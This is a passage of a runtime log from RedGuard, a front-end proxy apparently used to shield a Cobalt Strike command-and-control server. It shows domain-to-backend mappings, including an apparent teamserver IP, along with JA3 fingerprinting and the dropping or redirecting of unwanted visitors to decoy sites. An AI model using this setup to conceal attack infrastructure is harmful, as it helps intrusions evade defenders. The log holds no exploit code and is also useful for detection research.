17:15:58] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:15:58] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:02] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:03] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:08] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:16:25] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:16:25] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:16:25] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:16:25] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] 0 -[2022-05-30 17:16:33] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] 169 -[2022-05-30 17:16:34] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 -[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] 169 -[2022-05-30 17:16:39] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:23:58] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:23:58] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:23:58] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:23:58] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:24:13] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE %!s(int64=0)] -[2022-05-30 17:24:29] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:24:29] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:24:29] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:24:29] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:24:31] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE 0] -[2022-05-30 17:24:50] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:24:50] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:24:50] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:24:50] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:24:52] [RedGuard/core.(*baseHandle).ServeHTTP] [RESPONSE 0] -[2022-05-30 17:28:18] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:28:18] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:28:18] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:28:18] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:28:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:28:20] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:28:20] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length 271 -[2022-05-30 17:28:43] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:28:43] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:28:43] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:28:43] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:28:44] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:28:44] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:28:44] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length 271 -[2022-05-30 17:29:11] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:29:11] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:29:11] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:29:11] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:29:23] [RedGuard/core.(*baseHandle).ServeHTTP] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:29:23] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-30 17:32:28] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:32:28] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:32:28] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:32:28] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:32:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:32:29] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:32:30] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:32:59] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:32:59] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:32:59] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:32:59] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:33:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:33:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:33:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-30 17:33:00] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-05-30 17:33:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:33:14] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:33:14] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-30 17:33:14] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:33:18] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:33:18] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:33:18] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:33:18] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:33:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:33:19] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:33:19] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-30 17:33:20] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:34:42] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:34:42] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:34:42] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:34:42] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:34:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET /js/config.js -[2022-05-30 17:34:48] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:34:48] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 271 -[2022-05-30 17:34:48] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:34:57] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:34:57] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:34:57] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:34:57] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:35:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:35:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:35:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-30 17:35:00] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:41:36] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:41:36] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:41:36] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:41:36] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [JA3] Hash: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:41:37] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:41:37] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-30 17:41:37] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:42:06] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:42:06] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:42:06] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:42:06] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:42:08] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:42:08] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-30 17:42:08] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-30 17:42:23] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-30 17:42:23] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-30 17:42:23] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-30 17:42:23] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-30 17:42:24] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-30 17:42:24] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-30 17:42:24] [RedGuard/core.modifyResponse.func1.1] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-31 14:20:49] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:20:49] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:20:49] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:20:49] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:21:32] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-31 14:21:32] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-31 14:21:41] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:21:41] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:21:41] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:21:41] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:21:59] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:21:59] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:22:31] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-31 14:22:31] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://360.net -[2022-05-31 14:23:42] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:23:42] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:23:42] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:23:42] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:23:43] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:23:44] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-31 14:23:44] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-05-31 14:24:40] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:24:40] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:24:40] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:24:40] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:24:41] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:24:41] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 301 Moved Permanently, length: 169 -[2022-05-31 14:24:41] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:25:02] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:25:02] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-31 14:26:57] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:26:57] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:26:57] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:26:57] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:27:00] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:27:00] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-05-31 14:27:26] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-05-31 14:27:26] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-05-31 14:27:26] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-05-31 14:27:26] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 3590d1b8f63dd1d590f0adea4227443d -[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-05-31 14:27:28] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53L, like Gecko) Chrome/90.0.4430.212 Safari/537.36 -[2022-05-31 14:27:28] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 200 OK, length: 546 -[2022-06-01 15:36:04] [RedGuard/lib.InitGenerateSelfSignedCert] A default SSL certificate is being generated for the reverse proxy... -[2022-06-01 15:36:04] [main.(*cobaltStrike).serverInit] HostTarget: {"360.net":"http://127.0.0.1:8080","360.com":"https://47.94.170.143:4433/"} -[2022-06-01 15:36:04] [RedGuard/core.ProxyManger] Proxy Listen Port :80 (HTTP) -[2022-06-01 15:36:04] [RedGuard/core.ProxyManger] Proxy Listen Port :443 (HTTPS) -[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:11] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:36:11] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:11] [RedGuard/core.(*baseHandle).ServeHTTP] [REDIRECT] Source IP: 127.0.0.1 -> Destination Site: https://cloud.tencent.com/ -[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] JA3 FingerPrint: 68a2a6353c17dc14caf39d4996d1661c -[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] GET / -[2022-06-01 15:36:12] [RedGuard/core.(*baseHandle).ServeHTTP] [REQUEST] 127.0.0.1 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 -[2022-06-01 15:36:12] [RedGuard/core.modifyResponse.func1.1] [RESPONSE] HTTP 404 Not Found, length: 0 -[2022-06-01 15:36:12] [RedGuard/core.modifyResponse.func1.1] [DROP] Source IP: 127.0.0.1 -[2022-06-01 15:36:12] 